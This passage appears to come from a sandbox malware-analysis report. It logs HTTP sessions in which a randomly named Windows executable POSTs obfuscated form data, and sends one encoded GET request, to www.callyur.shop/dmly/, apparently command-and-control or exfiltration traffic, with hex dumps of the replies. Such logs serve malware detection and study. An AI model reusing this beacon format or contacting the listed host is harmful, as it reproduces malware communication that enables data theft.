                                                                                      Data Ascii: tion="75" result="effect1_foregroundBlur_2001_10" /></filter><filter id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFl


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      37192.168.2.84975466.29.137.10806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:23.079618931 CET758OUTPOST /dmly/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.callyur.shop
                                                                                      Origin: http://www.callyur.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.callyur.shop/dmly/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 65 7a 68 37 34 37 38 68 4d 68 77 48 7a 31 62 75 38 70 35 53 56 6b 4a 4e 58 73 56 4b 6c 72 6a 32 53 43 77 61 31 6c 4b 79 32 67 2f 4d 77 71 66 33 61 37 37 48 55 55 49 31 52 68 70 2b 70 75 50 77 4f 36 52 39 6f 44 66 6a 56 66 6d 39 73 31 34 55 65 31 48 79 51 54 43 59 73 6d 48 78 76 4c 36 67 4f 4f 52 75 5a 4a 41 36 43 58 61 44 4f 74 77 51 4e 54 42 69 65 69 52 53 6e 50 6d 63 43 71 4c 70 35 31 69 6b 50 37 49 34 52 37 4f 51 72 65 67 64 54 6b 71 6c 56 33 63 47 31 36 6a 4e 2b 62 38 73 30 35 4b 38 45 49 77 50 38 32 2f 44 4c 54 4e 53 59 6f 69 4a 30 38 50 48 48 33 6a 76 6e 78 4f 72 79 6f 67 67 66 68 77 3d
                                                                                      Data Ascii: UbRxm=ezh7478hMhwHz1bu8p5SVkJNXsVKlrj2SCwa1lKy2g/Mwqf3a77HUUI1Rhp+puPwO6R9oDfjVfm9s14Ue1HyQTCYsmHxvL6gOORuZJA6CXaDOtwQNTBieiRSnPmcCqLp51ikP7I4R7OQregdTkqlV3cG16jN+b8s05K8EIwP82/DLTNSYoiJ08PHH3jvnxOryoggfhw=
                                                                                      Nov 25, 2024 13:58:24.433928967 CET1236INHTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      content-encoding: gzip
                                                                                      vary: Accept-Encoding
                                                                                      date: Mon, 25 Nov 2024 12:58:24 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close
                                                                                      Data Raw: 31 33 34 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f [TRUNCATED]
                                                                                      Data Ascii: 134AZJvLmH$$pv5dNQU]]uQ(g9y~{'nLUo]~&neU~ycr:~z{UnTW=u)~}W>]X- V>5YQ]MkCmeaZ}i[~NF @$S~|VeYbwE]vYz9/Sy@;a@`/mt>P"anJ`9Bl~#e&a:MpG0Ow0K-ne[@8Fnwzf>v=%ZqM\[My}zze/meeUu7/y6? G*yg&Se^}UZ>Rx#?_|4A:6+)o9>I7d#8'@A4zs;Vo)nj#<YWzuLs9L`bsj|0b^%OAVWeB~oWnwx]Ix8wXC'x#o^@Nrg1abf.?u+_sbM^R6+=HrT~I*@W KYxSz125?V{:3>"m?Q
                                                                                      Nov 25, 2024 13:58:24.433967113 CET1236INData Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1a fc 29 01 81 f4 c5 30 a3 21 95 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e
                                                                                      Data Ascii: @o-q)0!w7dA 57#ao,}Od?yo+nY0{Q%~p(hi|{.!^~E}F>xazOyIhw)J=#>BAX!E`c3Y\W8a*~+z`U$
                                                                                      Nov 25, 2024 13:58:24.433979034 CET1236INData Raw: 1b 2e 4a 7c 3c 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 8d 6d 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 d0 1c 99 e2 da 1d 8d b0 04 ad 76 b1 c1 f0 c1 4c 1a 47 c3 b4 9e
                                                                                      Data Ascii: .J|<%..?,m[Y3\J'6&]4d,xG1!V"vLG<[/y]v<BBM3MF{5F"yV90{cT][|x:" GwcvpZ"pp);vLa3qe-xrF(bJ-pF-#;rRe);P|[ITK(IZE
                                                                                      Nov 25, 2024 13:58:24.434051991 CET672INData Raw: 68 43 00 a7 56 99 a6 3d 1f 17 71 bd 6a 02 8e 59 33 98 45 48 a7 0e 26 8c 6e 5e 74 94 9f 9d ec 0d 62 f0 fe 82 38 61 73 5c 84 8c 98 dc 4a 30 d1 64 f6 b0 d8 45 34 ce e4 0d 9e 1e bc 25 9c 06 fa 88 42 41 68 56 86 15 b1 70 37 9d d6 d5 51 ea d7 53 74 49
                                                                                      Data Ascii: hCV=qjY3EH&n^tb8as\J0dE4%BAhVp7QStIzKb'TX!Y2Nax(fxdarR^iXc,mO}iH!t7^'K_*Q*"9x3VduNgxN,ix:$q-HF2T])m
                                                                                      Nov 25, 2024 13:58:24.434062958 CET850INData Raw: 8c c2 8c 36 11 bd a7 d0 e8 4c 79 7c 46 2a 16 52 d0 9a 69 50 33 8d df 80 dc 17 d1 96 e5 a5 ba 1a 6e 79 41 54 59 76 6f a7 5d 1e 48 bc aa a6 c1 d6 1e 6f 23 5d a9 c5 00 67 5b 6a ba ad 5c 97 5d 8f 76 07 1f 6e 6b 8b 32 85 18 df 36 9c a1 9e 60 1b a6 1b
                                                                                      Data Ascii: 6Ly|F*RiP3nyATYvo]Ho#]g[j\]vnk26`[]_Luh?A&>-\7?|.1?EPQ|T4^Wosw6;U=2Au}z>/c;M}zb@


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      38192.168.2.84975566.29.137.10806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:25.742373943 CET778OUTPOST /dmly/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.callyur.shop
                                                                                      Origin: http://www.callyur.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.callyur.shop/dmly/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 65 7a 68 37 34 37 38 68 4d 68 77 48 79 55 72 75 2b 4b 52 53 63 6b 4a 4f 59 4d 56 4b 71 4c 6a 71 53 43 38 61 31 6b 4f 59 32 56 6e 4d 2b 72 76 33 62 36 37 48 48 6b 49 31 46 78 70 6d 6e 4f 50 46 4f 36 55 4f 6f 42 62 6a 56 66 79 39 73 31 49 55 66 47 76 7a 52 44 43 61 71 6d 48 76 6c 72 36 67 4f 4f 52 75 5a 4a 56 56 43 54 32 44 4f 39 41 51 4d 79 42 6c 55 43 52 64 6b 50 6d 63 47 71 4c 74 35 31 6a 42 50 35 73 65 52 2f 2b 51 72 66 51 64 54 78 47 6d 4f 6e 64 73 37 61 69 6f 76 62 56 53 77 35 57 42 49 75 73 51 69 6c 50 57 4f 6c 38 34 43 4b 71 50 33 38 6e 73 48 30 4c 5a 69 47 54 44 6f 4c 77 51 42 32 6d 43 35 6e 64 70 56 41 5a 44 4c 6c 34 2f 47 37 33 79 37 72 6a 58
                                                                                      Data Ascii: UbRxm=ezh7478hMhwHyUru+KRSckJOYMVKqLjqSC8a1kOY2VnM+rv3b67HHkI1FxpmnOPFO6UOoBbjVfy9s1IUfGvzRDCaqmHvlr6gOORuZJVVCT2DO9AQMyBlUCRdkPmcGqLt51jBP5seR/+QrfQdTxGmOnds7aiovbVSw5WBIusQilPWOl84CKqP38nsH0LZiGTDoLwQB2mC5ndpVAZDLl4/G73y7rjX
                                                                                      Nov 25, 2024 13:58:27.003834009 CET1236INHTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      content-encoding: gzip
                                                                                      vary: Accept-Encoding
                                                                                      date: Mon, 25 Nov 2024 12:58:26 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close
                                                                                      Data Raw: 31 33 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f [TRUNCATED]
                                                                                      Data Ascii: 1354ZJvLmH$$pv5dNQU]]uQ(g9y~{'nLUo]~&neU~ycr:~z{UnTW=u)~}W>]X- V>5YQ]MkCmeaZ}i[~NF @$S~|VeYbwE]vYz9/Sy@;a@`/mt>P"anJ`9Bl~#e&a:MpG0Ow0K-ne[@8Fnwzf>v=%ZqM\[My}zze/meeUu7/y6? G*yg&Se^}UZ>Rx#?_|4A:6+)o9>I7d#8'@A4zs;Vo)nj#<YWzuLs9L`bsj|0b^%OAVWeB~oWnwx]Ix8wXC'x#o^@Nrg1abf.?u+_sbM^R6+=HrT~I*@W KYxSz125?V{:3>"m?Q
                                                                                      Nov 25, 2024 13:58:27.003907919 CET1236INData Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1a fc 29 01 81 f4 c5 30 a3 21 95 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e
                                                                                      Data Ascii: @o-q)0!w7dA 57#ao,}Od?yo+nY0{Q%~p(hi|{.!^~E}F>xazOyIhw)J=#>BAX!E`c3Y\W8a*~+z`U$
                                                                                      Nov 25, 2024 13:58:27.003921986 CET1236INData Raw: 1b 2e 4a 7c 3c 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 8d 6d 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 d0 1c 99 e2 da 1d 8d b0 04 ad 76 b1 c1 f0 c1 4c 1a 47 c3 b4 9e
                                                                                      Data Ascii: .J|<%..?,m[Y3\J'6&]4d,xG1!V"vLG<[/y]v<BBM3MF{5F"yV90{cT][|x:" GwcvpZ"pp);vLa3qe-xrF(bJ-pF-#;rRe);P|[ITK(IZE
                                                                                      Nov 25, 2024 13:58:27.003931999 CET1236INData Raw: 68 43 00 a7 56 99 a6 3d 1f 17 71 bd 6a 02 8e 59 33 98 45 48 a7 0e 26 8c 6e 5e 74 94 9f 9d ec 0d 62 f0 fe 82 38 61 73 5c 84 8c 98 dc 4a 30 d1 64 f6 b0 d8 45 34 ce e4 0d 9e 1e bc 25 9c 06 fa 88 42 41 68 56 86 15 b1 70 37 9d d6 d5 51 ea d7 53 74 49
                                                                                      Data Ascii: hCV=qjY3EH&n^tb8as\J0dE4%BAhVp7QStIzKb'TX!Y2Nax(fxdarR^iXc,mO}iH!t7^'K_*Q*"9x3VduNgxN,ix:$q-HF2T])m
                                                                                      Nov 25, 2024 13:58:27.003945112 CET281INData Raw: f5 f2 dd 00 fe 09 f9 2b a1 ae 2f 94 3f 91 e5 9a fd 5b 98 7e 86 a5 3f bd 80 e9 cf 9f 2a e1 22 e7 7b 13 5e 6f f4 3c fc 47 8a 02 5a 7c 27 fb b3 86 ee be 3d c2 9f ad 7a 84 3f b2 ca 0d 8e 3e e0 eb 2a 0c bc b2 f8 f8 5c be 7b af e7 5f 06 d5 ab 63 f7 af
                                                                                      Data Ascii: +/?[~?*"{^o<GZ|'=z?>*\{_c`C+uU{>=wA}g_g~vN+-P}xU=3Ij_?1P}8|~t!w+7&x^Mt8f=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      39192.168.2.84975666.29.137.10806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:28.411695957 CET1795OUTPOST /dmly/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.callyur.shop
                                                                                      Origin: http://www.callyur.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.callyur.shop/dmly/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 65 7a 68 37 34 37 38 68 4d 68 77 48 79 55 72 75 2b 4b 52 53 63 6b 4a 4f 59 4d 56 4b 71 4c 6a 71 53 43 38 61 31 6b 4f 59 32 56 76 4d 2b 63 48 33 55 35 6a 48 57 55 49 31 61 42 70 79 6e 4f 50 59 4f 37 77 43 6f 42 58 73 56 64 4b 39 73 57 41 55 59 33 76 7a 61 44 43 61 6d 47 48 75 76 4c 37 69 4f 4f 42 71 5a 4a 46 56 43 54 32 44 4f 2b 59 51 4d 6a 42 6c 62 69 52 53 6e 50 6d 41 43 71 4c 42 35 30 4b 38 50 35 35 6a 52 73 32 51 71 2f 41 64 53 44 2b 6d 43 6e 63 4b 32 36 69 4b 76 62 4a 33 77 35 4b 7a 49 75 77 32 69 6c 6e 57 4e 68 78 6e 58 35 32 74 6f 66 76 66 66 46 6e 5a 36 78 6d 68 32 4c 4d 49 64 57 69 4e 2f 44 78 70 65 41 56 41 49 69 64 53 52 66 48 66 32 64 65 48 48 6d 59 4a 58 57 44 4a 36 68 73 4c 31 54 36 7a 4f 6c 71 35 41 50 6d 32 31 66 76 63 73 55 62 52 34 46 52 55 32 2f 37 2f 62 4e 38 58 4d 4a 4f 6c 41 6d 45 37 36 49 34 66 37 31 61 56 63 46 75 72 51 6a 35 54 63 35 57 42 55 57 5a 39 39 2b 6e 2b 7a 4c 49 47 54 4b 37 68 67 57 34 54 4b 68 39 79 50 39 4d 47 4a 4c 37 31 79 78 46 37 7a 68 56 65 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=ezh7478hMhwHyUru+KRSckJOYMVKqLjqSC8a1kOY2VvM+cH3U5jHWUI1aBpynOPYO7wCoBXsVdK9sWAUY3vzaDCamGHuvL7iOOBqZJFVCT2DO+YQMjBlbiRSnPmACqLB50K8P55jRs2Qq/AdSD+mCncK26iKvbJ3w5KzIuw2ilnWNhxnX52tofvffFnZ6xmh2LMIdWiN/DxpeAVAIidSRfHf2deHHmYJXWDJ6hsL1T6zOlq5APm21fvcsUbR4FRU2/7/bN8XMJOlAmE76I4f71aVcFurQj5Tc5WBUWZ99+n+zLIGTK7hgW4TKh9yP9MGJL71yxF7zhVeXbmrerLavpnM9dqV9OpepUfevsAtSK13CIgkZTe3lpO1VYWftxS4wvFRm1aT20EdjAbdAhaFbvi1p5VuKk7diDbDCOHpyruBc1T6w9FN/e4h3EG3l475XgAzUKZxzXNMTwMKj8bXFDrXYHz/qU7710xzeJeZB9GVfwOCLjBPJ0UfXc4xb+WDRt0QgSBD0ibJrzNrxlcE7Ndh94DGzJ/QJUvKbizoYk3lG020hCx9L7UQ+wU2WifLdRLr2HHBjcjKBnh72WPmBFUsYrv7Bud6MznrdupTUd6ays0tMMZ11ojtb0kKlMAUEPoPRpQEnjSM7vHwi4Qf8OFeO+gTRcQ48Rn4Fybk0nFyusHQm1TbnZ76isammx21TINX6GVt4VWNVmpXcNMyE8WG6CpNf9twDTJ/iZLJq/UhAXTODh+uNfhejc6pCVtDCoxwm9jO5IwfUYm6Rr2Wu3RKr+NqO7xmARlaMbyRA1ICLUzJ4dTTurjfc1HmKEcttZObOsxMY6eVMktYBcxBl0t2IZ9MHtg9k1c23lAxtx/ioGpUn2EQMh7MNErfGo05ML+21Dh5ewzBU5ZqRNAyB1I/dGgddvs+65sT66Wi4FcsbrcHkvnCQMDYZrN+jx0P0XztXBGbWiCz3ABSXzfkKq+zVh7sLbpNDCgR/QaR3nEEkM [TRUNCATED]
                                                                                      Nov 25, 2024 13:58:29.745877981 CET1236INHTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      content-encoding: gzip
                                                                                      vary: Accept-Encoding
                                                                                      date: Mon, 25 Nov 2024 12:58:29 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close
                                                                                      Data Raw: 31 33 34 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f [TRUNCATED]
                                                                                      Data Ascii: 134AZJvLmH$$pv5dNQU]]uQ(g9y~{'nLUo]~&neU~ycr:~z{UnTW=u)~}W>]X- V>5YQ]MkCmeaZ}i[~NF @$S~|VeYbwE]vYz9/Sy@;a@`/mt>P"anJ`9Bl~#e&a:MpG0Ow0K-ne[@8Fnwzf>v=%ZqM\[My}zze/meeUu7/y6? G*yg&Se^}UZ>Rx#?_|4A:6+)o9>I7d#8'@A4zs;Vo)nj#<YWzuLs9L`bsj|0b^%OAVWeB~oWnwx]Ix8wXC'x#o^@Nrg1abf.?u+_sbM^R6+=HrT~I*@W KYxSz125?V{:3>"m?Q
                                                                                      Nov 25, 2024 13:58:29.745975018 CET1236INData Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1a fc 29 01 81 f4 c5 30 a3 21 95 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e
                                                                                      Data Ascii: @o-q)0!w7dA 57#ao,}Od?yo+nY0{Q%~p(hi|{.!^~E}F>xazOyIhw)J=#>BAX!E`c3Y\W8a*~+z`U$
                                                                                      Nov 25, 2024 13:58:29.745987892 CET1236INData Raw: 1b 2e 4a 7c 3c 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 8d 6d 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 d0 1c 99 e2 da 1d 8d b0 04 ad 76 b1 c1 f0 c1 4c 1a 47 c3 b4 9e
                                                                                      Data Ascii: .J|<%..?,m[Y3\J'6&]4d,xG1!V"vLG<[/y]v<BBM3MF{5F"yV90{cT][|x:" GwcvpZ"pp);vLa3qe-xrF(bJ-pF-#;rRe);P|[ITK(IZE
                                                                                      Nov 25, 2024 13:58:29.746023893 CET1236INData Raw: 68 43 00 a7 56 99 a6 3d 1f 17 71 bd 6a 02 8e 59 33 98 45 48 a7 0e 26 8c 6e 5e 74 94 9f 9d ec 0d 62 f0 fe 82 38 61 73 5c 84 8c 98 dc 4a 30 d1 64 f6 b0 d8 45 34 ce e4 0d 9e 1e bc 25 9c 06 fa 88 42 41 68 56 86 15 b1 70 37 9d d6 d5 51 ea d7 53 74 49
                                                                                      Data Ascii: hCV=qjY3EH&n^tb8as\J0dE4%BAhVp7QStIzKb'TX!Y2Nax(fxdarR^iXc,mO}iH!t7^'K_*Q*"9x3VduNgxN,ix:$q-HF2T])m
                                                                                      Nov 25, 2024 13:58:29.746036053 CET286INData Raw: f5 f2 dd 00 fe 09 f9 2b a1 ae 2f 94 3f 91 e5 9a fd 5b 98 7e 86 a5 3f bd 80 e9 cf 9f 2a e1 22 e7 7b 13 5e 6f f4 3c fc 47 8a 02 5a 7c 27 fb b3 86 ee be 3d c2 9f ad 7a 84 3f b2 ca 0d 8e 3e e0 eb 2a 0c bc b2 f8 f8 5c be 7b af e7 5f 06 d5 ab 63 f7 af
                                                                                      Data Ascii: +/?[~?*"{^o<GZ|'=z?>*\{_c`C+uU{>=wA}g_g~vN+-P}xU=3Ij_?1P}8|~t!w+7&x^Mt8f=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      40192.168.2.84975766.29.137.10806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:58:31.068146944 CET510OUTGET /dmly/?YvA4=xnL8AvI8CJiPEDU&UbRxm=TxJb7MA4bghX/lTZi4FFUnx8X5IvqZr5NBwuw2qLyVi8/oqCfZzrCw4HdVl5+7DfFNR6jxv9e9mG0XYoVmaYbw3qmnHIup/BR6FUCIQOGhPMZ/gsWiB/XFVGgfvbM52XoA== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.callyur.shop
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:32.464726925 CET1236INHTTP/1.1 404 Not Found
                                                                                      keep-alive: timeout=5, max=100
                                                                                      content-type: text/html
                                                                                      transfer-encoding: chunked
                                                                                      date: Mon, 25 Nov 2024 12:58:32 GMT
                                                                                      server: LiteSpeed
                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                      connection: close
                                                                                      Data Raw: 32 37 37 32 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
